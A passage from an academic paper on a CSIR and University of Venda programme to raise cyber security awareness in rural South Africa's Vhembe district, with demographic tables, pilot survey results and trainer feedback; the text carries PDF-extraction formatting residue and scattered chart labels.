This can have a dramatic impact on National <strong>Security</strong>. For example, there are some arguments that<br />
South Africa’s strong ties with Ch<strong>in</strong>a could place the country at high risk of cyber war attacks (Stiennon,<br />
2009). The generic National <strong>Security</strong> framework proposed by Jansen van Vuuren, Phahlamohlaka and<br />
Brazzoli (2010) lists a number of cyber security threats to National <strong>Security</strong> due to the heightened<br />
broadband access. These threats can be categorized as either natural determ<strong>in</strong>ants or social<br />
determ<strong>in</strong>ants.<br />
2.1 Natural determ<strong>in</strong>ants<br />
Natural determ<strong>in</strong>ants are a causal factor <strong>in</strong>fluenced by the specific environment analysed.<br />
Geography and resources contributes largely to the impact of broadband penetration <strong>in</strong> a specific<br />
environment. For example, the shipment of outdated computers to Africa poses a security threat<br />
s<strong>in</strong>ce outdated software is vulnerable to attacks due to unavailability of updates. Taken <strong>in</strong>to<br />
consideration the 100 million computers <strong>in</strong> Africa the access will result <strong>in</strong> <strong>in</strong>ternet users and<br />
especially <strong>in</strong>dividuals <strong>in</strong> rural communities be<strong>in</strong>g attacked regularly.<br />
The population <strong>in</strong> a specific environment provides the extent to which broadband penetration can<br />
have an impact – the bigger the population, the higher the potential broadband penetration. For<br />
example, the occurrence of botnets may drastically <strong>in</strong>crease if <strong>in</strong>ternet connectivity is higher, as with<br />
high broadband access. This will result <strong>in</strong> armies of networked compromised computers <strong>in</strong> the homes<br />
of many South Africans, pos<strong>in</strong>g serious threats to a country’s National <strong>Security</strong>.<br />
2.2 Social determ<strong>in</strong>ants<br />
Social determ<strong>in</strong>ants are a causal factor <strong>in</strong>fluenced by the groups and <strong>in</strong>dividuals <strong>in</strong> the specific<br />
environment analysed.<br />
The economy plays a motivator role <strong>in</strong> the impact of cyber threats. Recently South Africans<br />
experienced several extensive scamm<strong>in</strong>g attacks, of which the most prom<strong>in</strong>ent the herd<strong>in</strong>g of<br />
personal <strong>in</strong>formation us<strong>in</strong>g South Africa Revenue Service (SARS) and the fraudulent World Cup<br />
offers supposedly from South African Airl<strong>in</strong>es (SAA). Many people have already succumbed to these<br />
fraudulent emails that gather their personal <strong>in</strong>formation. South African banks are also currently<br />
experienc<strong>in</strong>g an <strong>in</strong>crease <strong>in</strong> bank<strong>in</strong>g fraud that directly poses a threat to <strong>in</strong>dividuals that may lose<br />
their sav<strong>in</strong>gs.<br />
Politics has a direct <strong>in</strong>fluence on National <strong>Security</strong>. Accord<strong>in</strong>gly, attacks on websites of the African<br />
National Congress (ANC) - the rul<strong>in</strong>g party <strong>in</strong> South Africa - with the aim of discredit<strong>in</strong>g the party, or<br />
the use of party member names to scam money from <strong>in</strong>nocent citizens, resulted <strong>in</strong> embarrassment to<br />
the party and a tumultuous political environment. A fraudulent email discuss<strong>in</strong>g a national strike <strong>in</strong> the<br />
near future created uncerta<strong>in</strong>ty and could have created <strong>in</strong>stability <strong>in</strong> the country.<br />
The military is responsible for protect<strong>in</strong>g a country’s National <strong>Security</strong>. Currently, many South<br />
African citizens are not security savvy enough to thwart cyber attacks successfully, potentially leav<strong>in</strong>g<br />
the South African network compromised and open for attacks on a larger national scale.<br />
Psychology can play a large role <strong>in</strong> the social aspects of cyber threats. For example, Distributed<br />
Denial of Service (DDoS) attacks were already used to compromise websites and place<br />
Psychological Operations (PsyOps) messages on compromised websites, as seen <strong>in</strong> the Georgia<br />
attack <strong>in</strong> 2008. Recently, cell phones were also used to organise protests and <strong>in</strong>fluence citizens to<br />
take part <strong>in</strong> a national strike that paralyzed Mozambique’s capital (AFP, 2010).<br />
Information is paramount <strong>in</strong> any cyber threat. South Africa identified the need for Information<br />
Communication and Technology (ICT) access to all its citizens that must be promoted on all levels of<br />
the community and everybody must be exposed to the use and benefits of ICT. Along with <strong>in</strong>creased<br />
broadband access and connectivity by all its citizens, there are the possibilities of viruses that could<br />
damage user’s computers and <strong>in</strong>formation. Malicious code can also be used to overwrite the <strong>in</strong>fected<br />
computer’s hard drive which could result <strong>in</strong> massive loss of data and <strong>in</strong>formation as experienced <strong>in</strong><br />
Korea with the DDoS attacks (Kebbs, 2009).<br />
114
Marthie Grobler et al.<br />
The results of this analysis <strong>in</strong>dicated the necessity of security awareness <strong>in</strong> South Africa to combat these<br />
cyber threats. S<strong>in</strong>ce both natural and social determ<strong>in</strong>ants are commonplace and both these determ<strong>in</strong>ants<br />
potentially have a major effect on a country’s <strong>in</strong>formation <strong>in</strong>frastructure, it is necessary to consider the<br />
broadband penetration when plann<strong>in</strong>g a cyber security awareness project.<br />
2.3 Governments’ responsibility<br />
In the light of exist<strong>in</strong>g <strong>in</strong>ternational law doctr<strong>in</strong>e a country may be considered responsible for acts<br />
performed by residents if the country explicitly authorised these acts on its behalf. The country may also<br />
be held responsible for a breach of an <strong>in</strong>ternational obligation, or for not prevent<strong>in</strong>g an attack from tak<strong>in</strong>g<br />
place (Kulesza, 2010). Developments <strong>in</strong> global technology make it difficult for a country to control its<br />
residents’ actions <strong>in</strong> operat<strong>in</strong>g hardware located with<strong>in</strong> the country’s territory, and nearly impossible to<br />
control non-residents outside a country’s jurisdiction that controls hardware <strong>in</strong>side the country’s<br />
jurisdiction. Regardless of the associated difficulties, cyber crime is a reality that unfortunately often<br />
targets the uneducated <strong>in</strong>dividuals that do not know how to identify cyber scams or how to keep their<br />
computers protected.<br />
Therefore, South Africa can be considered responsible for prevent<strong>in</strong>g attacks from <strong>in</strong>side its borders to<br />
other countries. It is accord<strong>in</strong>gly the responsibility of the South African Government to support extensive<br />
awareness programs to prevent attacks from <strong>in</strong>side South Africa’s borders on other countries. In its quest<br />
to manage Cyber <strong>Security</strong>, a formal notice was issued <strong>in</strong> February 2010 regard<strong>in</strong>g its <strong>in</strong>tention of<br />
publish<strong>in</strong>g a South African National Cyber <strong>Security</strong> Policy (Gazette No 32963, Feb 19, 2010). The<br />
country did this with<strong>in</strong> the context of its global citizenry and the commitment it has made to the World<br />
Summit on Information Society (WSIS) <strong>in</strong> 2001, and to the International Telecommunication Union (ITU)<br />
to assist <strong>in</strong> further development of the Global Cyber <strong>Security</strong> Agenda (GCA). One of the elements of this<br />
policy is the importance of cyber security awareness programs for South Africa.<br />
3. Situational analysis – the case of the Vhembe district<br />
The CSIR and the University of Venda's schools of Mathematical and Natural Sciences, and<br />
Management Sciences are collaborat<strong>in</strong>g to raise cyber security awareness <strong>in</strong> local rural communities <strong>in</strong><br />
the South African Limpopo prov<strong>in</strong>ce, Vhembe district. In Phase 1, a group of CSIR researchers tra<strong>in</strong>ed a<br />
number of student volunteers at the University of Venda to teach specific groups of computer users,<br />
<strong>in</strong>clud<strong>in</strong>g secondary school users, further education tra<strong>in</strong><strong>in</strong>g users, university (non-technical) users and<br />
community centre users. More rural communities are becom<strong>in</strong>g <strong>in</strong>tegrated <strong>in</strong>to the global village due to<br />
<strong>in</strong>creased hardware and software corporate donations, the proliferation of mobile Internet devices and<br />
government programmes aimed at bridg<strong>in</strong>g the digital divide. The next section will provide some<br />
<strong>in</strong>formation on the area.<br />
3.1 Limpopo Prov<strong>in</strong>ce<br />
The Limpopo Prov<strong>in</strong>ce comprises four districts: Vhembe, Capricorn, Greater Sekhukhune Waterberg and<br />
Mopani. In 2001, 33% of the population aged 20 years or older <strong>in</strong> Limpopo had no education at all, while<br />
7% had post-high-school education (see Table 1). These figures, <strong>in</strong> general, show an <strong>in</strong>crease <strong>in</strong> all<br />
categories s<strong>in</strong>ce 1996 with the exception of the no school<strong>in</strong>g category. This decrease <strong>in</strong>dicates a higher<br />
percentage of people attend<strong>in</strong>g school.<br />
Table 1: Level of education among adults 20 years or older, <strong>in</strong> Limpopo, 2001<br />
Number %<br />
No school<strong>in</strong>g 789731 33<br />
Some primary education 336377 14<br />
Completed primary education 133206 6<br />
Some secondary education 629057 26<br />
Grade 12/Standard 10 337627 14<br />
Higher education 162454 7<br />
Total 2388452 100<br />
In Limpopo there are approximately 4290 primary schools and 1300 secondary schools with over 1.8<br />
million learners and almost 58000 teachers (2002). In 2002 less than 10% of the schools <strong>in</strong> the prov<strong>in</strong>ce<br />
were computerised and fewer than half of those were really utilis<strong>in</strong>g their computers. S<strong>in</strong>ce then the<br />
115
Marthie Grobler et al.<br />
situation has improved, ma<strong>in</strong>ly due to a considerable amount of donations, but many schools still lack<br />
computers, connections and capabilities related to them.<br />
In higher education <strong>in</strong>stitutions <strong>in</strong> Limpopo, there are about 40000 students enrolled per year. The<br />
number of university graduates is about 15000 per year, with only 4% graduat<strong>in</strong>g <strong>in</strong> ICT related fields.<br />
The Limpopo prov<strong>in</strong>ce had an enrolment figure of 10500 for 2010.<br />
3.2 Vhembe District<br />
The Vhembe District covers 21407 square km of land. It was orig<strong>in</strong>ally settled by tribes of Khoisan<br />
people. It was later settled by the Venda people (recently migrated from what is now Matabeleland South<br />
<strong>in</strong> Zimbabwe), who constitute a majority of the Vhembe population today. Accord<strong>in</strong>g to the DWAF Stats<br />
Form-D study, the Vhembe population has <strong>in</strong>creased and is now stand<strong>in</strong>g at 1.388427 million people.<br />
The number of households is estimated at 269547, with 50% of the population be<strong>in</strong>g under the age of 20<br />
years. The District is still faced with <strong>in</strong>frastructural backlog, with 53% of the population not hav<strong>in</strong>g access<br />
to runn<strong>in</strong>g water, 68% of the population not hav<strong>in</strong>g access to sanitation, and 46% of the population not<br />
hav<strong>in</strong>g access to basic levels of electricity (Vhembe District Municipality, 2007). As a result, much of the<br />
population would use centralised community centres or <strong>in</strong>ternet cafes to access the <strong>in</strong>ternet.<br />
About 57% of the population does not have formal education, 9% has primary education, 20% has<br />
secondary education and only 3% has tertiary education. The ma<strong>in</strong> contributions to the economy are<br />
community services (22%), trade (14%) and m<strong>in</strong><strong>in</strong>g (0.7%). Tourism, agriculture and manufactur<strong>in</strong>g are<br />
also significant with potential to be further enhanced. The unemployment level is at 53% (Vhembe District<br />
Municipality, 2007). Tables 2 to 5, and Figure 1 show a range of demographic related statistics on the<br />
population of the Vhembe District.<br />
Table 2: Local municipalities (Vhembe District Municipality, 2007)<br />
Local municipality Population %<br />
Thulamela 584 568 48.72%<br />
Makhado 497 093 41.43%<br />
Mutale 78 917 6.58%<br />
Mus<strong>in</strong>a 39 308 3.28%<br />
Table 3: Language and population demographics (Vhembe District Municipality, 2007)<br />
Language Population %<br />
Venda 818 900 68.25%<br />
Tsonga 316 703 26.40%<br />
Northern Sotho 27 922 2.33%<br />
Afrikaans 13 697 1.14%<br />
Sotho 7 714 0.64%<br />
Other 5 942 0.50%<br />
English 4 545 0.38%<br />
Ndebele 1 763 0.15%<br />
Zulu 870 0.07%<br />
Tswana 840 0.07%<br />
Xhosa 659 0.05%<br />
Swati 331 0.03%<br />
Table 4: Gender composition (Vhembe District Municipality, 2007)<br />
Gender Population %<br />
Female 662 815 55.24%<br />
Male 537 041 44.76%<br />
116
Marthie Grobler et al.<br />
Table 5: Ethnic groups (Vhembe District Municipality, 2007)<br />
Ethnic group Population %<br />
Black African 1 181 672 98.48%<br />
White 13 625 1.14%<br />
Indian/Asian 2 911 0.24%<br />
Coloured 1 648 0.14%<br />
Figure 1: Age analysis (Vhembe District Municipality, 2007)<br />
These new netizens <strong>in</strong> rural communities are not cyber security savvy. This is why cyber security selfdefence<br />
workshops for volunteer facilitators <strong>in</strong> the Vhembe district were <strong>in</strong>troduced. Discussions for the<br />
<strong>in</strong>itiative started at the end of 2009 but the formal plann<strong>in</strong>g, collaboration and the development of the<br />
cyber security awareness tra<strong>in</strong><strong>in</strong>g programme officially commenced <strong>in</strong> May 2010.<br />
4. Current level of awareness <strong>in</strong> the Vhembe district<br />
The proposed cyber security awareness tra<strong>in</strong><strong>in</strong>g module is part of a larger project that aims to establish<br />
an Institute for Broadband and Rural ICT Development at the University of Venda to assist rural<br />
communities <strong>in</strong> adapt<strong>in</strong>g to the opportunities presented by broadband and other forms of ICT. As part of<br />
the project, the CSIR developed surveys to assess the current level of cyber security awareness with<strong>in</strong><br />
the communities. Large numbers of these surveys were distributed to some of the community centres<br />
and schools participat<strong>in</strong>g <strong>in</strong> the project.<br />
Dur<strong>in</strong>g the second part of 2010, a number of surveys were distributed to both educators and secondary<br />
school learners <strong>in</strong> the Vhembe District. These surveys were presented to participants before any cyber<br />
security awareness tra<strong>in</strong><strong>in</strong>g material was presented to them, <strong>in</strong>tended to test current awareness of cyber<br />
related topics. The surveys were presented <strong>in</strong> English, which is not the mother tongue for most of the<br />
participants. The results presented next accord<strong>in</strong>gly need to take potentially language barriers <strong>in</strong>to<br />
consideration.<br />
4.1 Educators’ survey<br />
One of the <strong>in</strong>itial pilot studies was done with educators attend<strong>in</strong>g a community centre focused on the<br />
development of Mathematics and Science of learners <strong>in</strong> rural communities. Participants <strong>in</strong> the survey<br />
<strong>in</strong>dicated that they do not have a problem with English as spoken language, but they are not comfortable<br />
with English as a written language. These results were confirmed with contradict<strong>in</strong>g answers given <strong>in</strong> the<br />
surveys. Participants were mostly over the age of 30 and thus did not grow up <strong>in</strong> the technological era for<br />
these rural communities. More than 90% of the participants have cell phones, but they <strong>in</strong>dicated that this<br />
is used mostly for text messag<strong>in</strong>g and verbal communication.<br />
Although 67% of the participants have access to a computer (either at home or at work), the participants<br />
<strong>in</strong>dicated that they do not make use of computer-based <strong>in</strong>stant messag<strong>in</strong>g. Participants with access to<br />
computers do make use of the <strong>in</strong>ternet for <strong>in</strong>formational purposes. Participants <strong>in</strong>dicated that the use of<br />
the <strong>in</strong>ternet for e-commerce was limited and that they prefer not to make use, for example, of the South<br />
African onl<strong>in</strong>e system for <strong>in</strong>come tax completion (e-fil<strong>in</strong>g). Most of the participants correctly <strong>in</strong>dicated the<br />
117
Marthie Grobler et al.<br />
mean<strong>in</strong>g of social network<strong>in</strong>g, whilst only 44% knew what the terms phish<strong>in</strong>g and viruses meant.<br />
Participants did not know what a strong password is but did <strong>in</strong>dicate that they will not reveal their<br />
passwords to one another. Participants <strong>in</strong>dicated that they would advise their children to meet onl<strong>in</strong>e<br />
friends <strong>in</strong> places other than chatt<strong>in</strong>g rooms. This can potentially place the children <strong>in</strong> danger of meet<strong>in</strong>g<br />
sexual predators <strong>in</strong> a real world scenario. A further concern is that 44% of the participants were prepared<br />
to submit their personal details to a popular website, with no regard of the security implications and<br />
potential for identity theft. Although the sample group did not constitute a large percentage of the<br />
educator group <strong>in</strong> the Vhembe District, the results clearly <strong>in</strong>dicate that the current cyber security<br />
awareness level is relatively low, and there is a dire need for urgent awareness tra<strong>in</strong><strong>in</strong>g. This pilot study<br />
therefore serves as additional motivation to cont<strong>in</strong>ue the research and roll out the awareness tra<strong>in</strong><strong>in</strong>g on<br />
a larger scale with<strong>in</strong> the Vhembe District.<br />
4.2 Secondary schools’ survey<br />
Surveys were distributed at two secondary schools <strong>in</strong> the Vhembe District. At School A, 69% of<br />
participants <strong>in</strong>dicated that they were comfortable with English as a written language, whilst 15% <strong>in</strong>dicated<br />
that they were only comfortable with English as a spoken language. At School B, 26% of participants<br />
<strong>in</strong>dicated that they were comfortable with English as a written language, whilst 84% <strong>in</strong>dicated that they<br />
were only comfortable with English as a spoken language. At both schools, majority of participants<br />
<strong>in</strong>dicated that they only have access to cell phones as technology devices. At both schools, only 7% of<br />
participants have had prior access to a desktop computer. Participants with access to computers or cell<br />
phones connected to the <strong>in</strong>ternet use it for enterta<strong>in</strong>ment and gam<strong>in</strong>g.<br />
At both schools, most of the participants correctly <strong>in</strong>dicated the mean<strong>in</strong>g of phish<strong>in</strong>g and social<br />
network<strong>in</strong>g. Although not all participants have regular access to social network<strong>in</strong>g sites or onl<strong>in</strong>e chatt<strong>in</strong>g,<br />
they are aware of some of the <strong>in</strong>herent dangers of communicat<strong>in</strong>g over the <strong>in</strong>ternet. Most participants<br />
<strong>in</strong>dicated that they would not arrange an actual meet<strong>in</strong>g with someone that they have met onl<strong>in</strong>e. 99% of<br />
all participants have <strong>in</strong>dicated that they will not submit personal <strong>in</strong>formation on a website, even if that<br />
website is very popular. At School A, 69% of participants <strong>in</strong>dicated that it is wrong to break <strong>in</strong>to someone<br />
else’s email account and send emails pretend<strong>in</strong>g to be the other person. 23% of participants <strong>in</strong>dicated<br />
that they would like to learn how to break <strong>in</strong>to someone else’s email account. At School B, only 24% of<br />
participants <strong>in</strong>dicated that it is wrong to break <strong>in</strong>to someone else’s email account and send emails<br />
pretend<strong>in</strong>g to be the other person, whilst 100% of participants <strong>in</strong>dicated that they would like to learn how<br />
to do this. Most participants correctly identified weak passwords. Typical to the general classification of<br />
Millennials or Generation Y (<strong>in</strong>dividuals born between 1982 and 2000), the participants show <strong>in</strong>creased<br />
tendencies towards ambition, new challenges and <strong>in</strong>quisitiveness (Kane, 2010). The participants have<br />
created a long list of topics that they would like to see addressed <strong>in</strong> future cyber security awareness<br />
tra<strong>in</strong><strong>in</strong>g programs.<br />
4.3 Development of tra<strong>in</strong><strong>in</strong>g material<br />
The proposed cyber security awareness program focuses on educat<strong>in</strong>g beg<strong>in</strong>ner <strong>in</strong>ternet and technology<br />
users <strong>in</strong> basic computer security, and safe and secure onl<strong>in</strong>e habits. The objective of this program is to<br />
prepare civilians for use of broadband applications and new applications for cyberspace. It aims to<br />
<strong>in</strong>crease awareness and understand<strong>in</strong>g of the dangers of the <strong>in</strong>ternet, whilst provid<strong>in</strong>g <strong>in</strong>dividuals with the<br />
necessary knowledge to make the right decisions <strong>in</strong> <strong>in</strong>ternet-related situations. This program is not a<br />
computer literacy course, but can be better def<strong>in</strong>ed as a self-defence course for <strong>in</strong>ternet users. The target<br />
audience is computer users with work<strong>in</strong>g computer literacy and awareness and prior exposure to the<br />
<strong>in</strong>ternet. These <strong>in</strong>dividuals should not have any formal computer related tra<strong>in</strong><strong>in</strong>g, with the exception of<br />
computer literacy courses. For the time be<strong>in</strong>g, four user groups are identified:<br />
Secondary school pupils,<br />
Further education tra<strong>in</strong><strong>in</strong>g (FET) college students,<br />
University students not study<strong>in</strong>g towards a technical or <strong>in</strong>formation technology degree, and<br />
Community members us<strong>in</strong>g the computer facilities of community centres.<br />
The program is rolled-out <strong>in</strong> the Vhembe District, Thohoyandou <strong>in</strong> the Limpopo prov<strong>in</strong>ce of South Africa.<br />
With<strong>in</strong> the prov<strong>in</strong>ce, entities had to be selected to partake <strong>in</strong> this program. Two classifications are used<br />
for entity selection, as shown <strong>in</strong> Table 6.<br />
118
Table 6: Classification regard<strong>in</strong>g entity selection<br />
Marthie Grobler et al.<br />
Less resourced entity More resourced entity<br />
Internet connection 1 modem > 1 modem or ADSL<br />
Number of computers < 5 5 or more<br />
Number of users/computers 100:1 99:1 <<br />
Level of ma<strong>in</strong>tenance (functionality) Less than 50% work<strong>in</strong>g More than 50% work<strong>in</strong>g<br />
For the <strong>in</strong>itial tra<strong>in</strong><strong>in</strong>g program, only schools and centres that have previous exposure to computer<br />
facilities and <strong>in</strong>ternet access are selected as participants <strong>in</strong> the setup.<br />
The cyber security awareness program modules are divided <strong>in</strong>to four ma<strong>in</strong> topics:<br />
Physical security – This tra<strong>in</strong><strong>in</strong>g session addresses the importance of secur<strong>in</strong>g the physical computer<br />
<strong>in</strong> order to protect the computer user from potential cyber security dangers. This session addresses<br />
the physical protection of computers, laptops and mobile phones, as well as the importance of<br />
password protection.<br />
Malware and malware countermeasures – This tra<strong>in</strong><strong>in</strong>g session touches on some of the different<br />
types of malware that can be encountered <strong>in</strong> cyberspace, and provide guidel<strong>in</strong>es on how to protect a<br />
computer or mobile phone from these malware types.<br />
Safe surf<strong>in</strong>g – This session addresses the guidel<strong>in</strong>es that <strong>in</strong>ternet users should practice to ensure<br />
that the time they spend onl<strong>in</strong>e are productive and secure. This session addresses <strong>in</strong>ternet surf<strong>in</strong>g,<br />
email security, file shar<strong>in</strong>g, copyright, downloads and stor<strong>in</strong>g <strong>in</strong> more detail.<br />
Social aspects of cyber security – This session addresses the safest way to use social network<strong>in</strong>g, as<br />
well as the dangers that are associated with social media on the <strong>in</strong>ternet and cyberspace. This<br />
session also <strong>in</strong>troduces social eng<strong>in</strong>eer<strong>in</strong>g, identity theft, cookies and cyberbullies.<br />
5. Feedback from student tra<strong>in</strong>ers<br />
In September 2010, researchers from the CSIR have tra<strong>in</strong>ed a number of volunteers from the University<br />
of Venda to tra<strong>in</strong> the community. The majority of these students are second and third year computer<br />
science students from the University of Venda. These students assisted with the distributions and<br />
collection of <strong>in</strong>itial surveys to the participat<strong>in</strong>g entities to determ<strong>in</strong>e the current level of cyber security<br />
awareness. After complet<strong>in</strong>g the tra<strong>in</strong><strong>in</strong>g, the student tra<strong>in</strong>ers completed questionnaires about their<br />
experience. Figures 2 to 5 show the student tra<strong>in</strong>ers' feedback on the content of the tra<strong>in</strong><strong>in</strong>g modules.<br />
S<strong>in</strong>ce the number of tra<strong>in</strong>ers needed for the pilot project was relatively small, the responses to the<br />
questionnaire are not <strong>in</strong>dicative of the awareness level of the <strong>in</strong>tended target audiences, but rather an<br />
<strong>in</strong>dication towards the usability of the tra<strong>in</strong><strong>in</strong>g modules.<br />
From Figures 2 to 5, it is clear to the student tra<strong>in</strong>ers found the tra<strong>in</strong><strong>in</strong>g modules very useful and<br />
<strong>in</strong>formative. Where necessary (e.g. community centre, topic cookies), the material were adjusted<br />
accord<strong>in</strong>g to the feedback received from the student tra<strong>in</strong>ers.<br />
Number of responses<br />
4<br />
3<br />
2<br />
1<br />
0<br />
Physical<br />
computer<br />
security<br />
Physical<br />
mobile<br />
security<br />
Password<br />
protection<br />
Virus<br />
protection<br />
Secondary school feedback on content<br />
Pop-ups,<br />
adware and<br />
spyware<br />
Botnets<br />
Surf<strong>in</strong>g<br />
the<br />
web<br />
Topics<br />
Email<br />
security<br />
File<br />
shar<strong>in</strong>g<br />
and<br />
copyright<br />
Not <strong>in</strong>terest<strong>in</strong>g Did not learn anyth<strong>in</strong>g new Learned some new th<strong>in</strong>gs Learned a lot of new th<strong>in</strong>gs Too technical<br />
Figure 2: Feedback on the content of the secondary school tra<strong>in</strong><strong>in</strong>g module<br />
119<br />
Social<br />
network<strong>in</strong>g<br />
Social<br />
eng<strong>in</strong>eer<strong>in</strong>g<br />
Identity theft<br />
Cookies<br />
Cyberbullies
Number of responses<br />
5<br />
4<br />
3<br />
2<br />
1<br />
0<br />
Physical<br />
computer<br />
security<br />
Physical<br />
mobile<br />
security<br />
Password<br />
protection<br />
Virus<br />
protection<br />
Marthie Grobler et al.<br />
Further education tra<strong>in</strong><strong>in</strong>g feedback on content<br />
Pop-ups,<br />
adware and<br />
spyware<br />
Botnets<br />
Surf<strong>in</strong>g the<br />
web<br />
Email<br />
security<br />
Topics<br />
File shar<strong>in</strong>g<br />
and<br />
copyright<br />
Not <strong>in</strong>terest<strong>in</strong>g Did not learn anyth<strong>in</strong>g new Learned some new th<strong>in</strong>gs Learned a lot of new th<strong>in</strong>gs Too technical<br />
Figure 3: Feedback on the content of the FET tra<strong>in</strong><strong>in</strong>g module<br />
Number of responses<br />
4<br />
3<br />
2<br />
1<br />
0<br />
Physical<br />
computer<br />
security<br />
Physical<br />
mobile<br />
security<br />
Password<br />
protection<br />
Virus<br />
protection<br />
Pop-ups,<br />
adware and<br />
spyware<br />
Internet<br />
bank<strong>in</strong>g<br />
University (non-IT) feedback on content<br />
Botnets<br />
Surf<strong>in</strong>g the<br />
web<br />
Email<br />
security<br />
Topics<br />
File shar<strong>in</strong>g<br />
and<br />
copyright<br />
Not <strong>in</strong>terest<strong>in</strong>g Did not learn anyth<strong>in</strong>g new Learned some new th<strong>in</strong>gs Learned a lot of new th<strong>in</strong>gs Too technical<br />
Figure 4: Feedback on the content of the university tra<strong>in</strong><strong>in</strong>g module<br />
Number of responses<br />
6<br />
5<br />
4<br />
3<br />
2<br />
1<br />
0<br />
Physical<br />
computer<br />
security<br />
Physical<br />
mobile<br />
security<br />
Password<br />
protection<br />
Virus<br />
protection<br />
Pop-ups,<br />
adware and<br />
spyware<br />
Internet<br />
bank<strong>in</strong>g<br />
Community centre feedback on content<br />
Botnets<br />
Surf<strong>in</strong>g the<br />
web<br />
Email<br />
security<br />
Topics<br />
File shar<strong>in</strong>g<br />
and<br />
copyright<br />
Not <strong>in</strong>terest<strong>in</strong>g Did not learn anyth<strong>in</strong>g new Learned some new th<strong>in</strong>gs Learned a lot of new th<strong>in</strong>gs Too technical<br />
Figure 5: Feedback on the content of the community centre tra<strong>in</strong><strong>in</strong>g module<br />
6. The way forward<br />
The next step <strong>in</strong> the cyber security awareness program is to roll the tra<strong>in</strong><strong>in</strong>g material out to the<br />
community. Each of the students that were tra<strong>in</strong>ed is allocated to a specific entity. These students have<br />
to tra<strong>in</strong> the community <strong>in</strong> their specific entity. The community tra<strong>in</strong><strong>in</strong>g program is free of charge, but the<br />
volunteers need to adhere to specific conditions <strong>in</strong> order to participate <strong>in</strong> the program:<br />
120<br />
Internet<br />
bank<strong>in</strong>g<br />
Social<br />
network<strong>in</strong>g<br />
Social<br />
network<strong>in</strong>g<br />
Social<br />
network<strong>in</strong>g<br />
Social<br />
eng<strong>in</strong>eer<strong>in</strong>g<br />
Social<br />
eng<strong>in</strong>eer<strong>in</strong>g<br />
Social<br />
eng<strong>in</strong>eer<strong>in</strong>g<br />
Identity theft<br />
Identity theft<br />
Identity theft<br />
Cookies<br />
Cookies<br />
Cookies<br />
Cyberbullies<br />
Cyberbullies<br />
Cyberbullies
Marthie Grobler et al.<br />
The volunteer needs to complete a questionnaire before start<strong>in</strong>g the tra<strong>in</strong><strong>in</strong>g. This questionnaire will<br />
not be anonymous and will allow the CSIR to score the <strong>in</strong>dividual's current level of cyber security<br />
awareness.<br />
The volunteer needs to be will<strong>in</strong>g to attend classes organised and hosted by the student volunteer<br />
tra<strong>in</strong>ers from the University of Venda. The tra<strong>in</strong>ers will communicate the dates and times of these<br />
tra<strong>in</strong><strong>in</strong>g with the volunteers. To be a part of this tra<strong>in</strong><strong>in</strong>g, the volunteer needs to attend all the classes<br />
and workshops.<br />
The volunteer needs to complete a questionnaire after complet<strong>in</strong>g the tra<strong>in</strong><strong>in</strong>g. This questionnaire will<br />
not be anonymous and will allow the CSIR to score the <strong>in</strong>dividual's awareness after complet<strong>in</strong>g the<br />
program.<br />
The questionnaires consist of three sections. Basic demographic <strong>in</strong>formation is asked <strong>in</strong> order to<br />
customize the cyber security awareness tra<strong>in</strong><strong>in</strong>g program to fit a specific user group and <strong>in</strong> order to<br />
identify an <strong>in</strong>dividual's level of awareness. History and background – Technology questions are asked <strong>in</strong><br />
order to determ<strong>in</strong>e the current level of technology usage with<strong>in</strong> the specific user's environment. Specific<br />
scenarios are asked to determ<strong>in</strong>e the current level of cyber security awareness and understand<strong>in</strong>g with<strong>in</strong><br />
the specific user's environment.<br />
7. Conclusion<br />
The results from the pilot surveys h<strong>in</strong>t toward a low level of awareness regard<strong>in</strong>g the implications and<br />
dangers of cyber warfare and the consequences of participation <strong>in</strong> social networks. Although the current<br />
research is based on an exploratory study with a small group of participants, the research uncovered a<br />
need for <strong>in</strong>tensive further tra<strong>in</strong><strong>in</strong>g <strong>in</strong> a number of identified modules, <strong>in</strong>clud<strong>in</strong>g secondary schools, further<br />
education tra<strong>in</strong><strong>in</strong>g colleges and community centres, as well as all university staff and students. The ma<strong>in</strong><br />
benefit of a large scale roll out of this cyber security awareness tra<strong>in</strong><strong>in</strong>g programme is that empowered<br />
tra<strong>in</strong>ees should be able to identify the dangers of provid<strong>in</strong>g <strong>in</strong>formation and/or enroll<strong>in</strong>g on social<br />
networks where they and their personal <strong>in</strong>formation can be exposed and the <strong>in</strong>formation could be<br />
abused. Further awareness tra<strong>in</strong><strong>in</strong>g targeted at the different stakeholder group<strong>in</strong>gs should ensure that<br />
capacity is build and that the Vhembe District will become one of the first districts <strong>in</strong> South Africa with a<br />
full understand<strong>in</strong>g and appreciation of cyber security and social network<strong>in</strong>g dangers. Further research<br />
and additional work toward this project should drastically improve the level of cyber security awareness <strong>in</strong><br />
South Africa.<br />
References<br />
AFP. (2010). Mozambique unrest shows power of the SMS. Available from: http://www.mg.co.za/article/ 2010-09-07mozambique-unrest-shows-power-of-the-sms<br />
(Accessed 15 October 2010).<br />
Jansen van Vuuren JC, Phahlamohlaka. J, & Brazzoli M. (2010). The impact of the <strong>in</strong>crease <strong>in</strong> broadband access on<br />
National <strong>Security</strong> and the average citizen. Journal of Information Warfare. Vol 9(3). Dec 2010<br />
Kane, S. (2010). Generation Y. Available from: http://legalcareers.about.com/od/practicetips/a/ GenerationY.htm<br />
(Accessed 7 January 2011).<br />
Kebbs, B. (2009). PCs used <strong>in</strong> Korean DDoS attacks may self destruct. Available from:<br />
http://voices.wash<strong>in</strong>gtonpost.com/securityfix/2009/07/pcs_used_<strong>in</strong>_korean_ddos_attack.html (Accessed 4<br />
September 2009).<br />
Kulesza, J. (2010). State responsibility for acts of cyber-terrorism. Paper presented at the 5 th GigaNet Symposium.<br />
Available from: http://api.n<strong>in</strong>g.com/files/6Uhv8JceS2kZGH4RRbdEOAwdiHrryXnRiwQO<br />
v1MGYU6hEcBG9M4F5irLoK8B56a8hO*0kQ*CbTExGBpq8wjcPQZzChrSUrXV/KULESKA.pdf (Accessed 17<br />
November 2010).<br />
Phahlamohlaka, J. (2008). Globalisation and national security issues for the state: Implications for national ICT<br />
policies. Social Dimensions Of Information And Communication Technology Policy. Vol. 282/2008 Spr<strong>in</strong>ger<br />
Boston pp. 95-107.<br />
Stiennon, R. (2009). SA could face cyber war. Available from: http://ww2.itweb.co.za/sections/<br />
<strong>in</strong>ternet/2009/0905291159.asp?A=COV&S=Cover&T=Section&O=C (Accessed 29 May 2009).<br />
Vhembe District Municipality. (2007). Quality <strong>in</strong> Service. Available from: http://www.vhembe.gov.za/docs/<br />
Approved%20IDP%20f<strong>in</strong>al%20version%201%202007-8%20-2011-12.pdf (Accessed 2 February 2011).<br />
